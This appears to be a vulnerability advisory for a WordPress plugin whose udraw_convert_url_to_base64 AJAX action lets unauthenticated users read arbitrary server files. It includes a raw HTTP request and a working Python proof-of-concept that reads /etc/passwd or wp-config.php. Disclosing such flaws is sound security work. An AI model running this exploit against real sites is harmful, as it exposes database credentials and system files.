The plugin does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc)
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Connection: close action=udraw_convert_url_to_base64&url=/etc/passwd #!/usr/bin/env python3 # # Usage: # python3 poc.py <wordpress root url> <absolute filepath to include> # # Example: # python3 poc.py http://127.0.0.1:8080/ /etc/passwd # import sys import base64 import requests target_url = sys.argv[1] filepath = sys.argv[2] with requests.Session() as session: response = session.get(target_url) response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={ "action": "udraw_convert_url_to_base64", "url": filepath, }) b64_file = response.text.split(",")[1].strip('"') print(base64.b64decode(b64_file).decode())
cydave
cydave
Yes
2022-03-29 (about 1 years ago)
2022-03-29 (about 1 years ago)
2022-04-13 (about 1 years ago)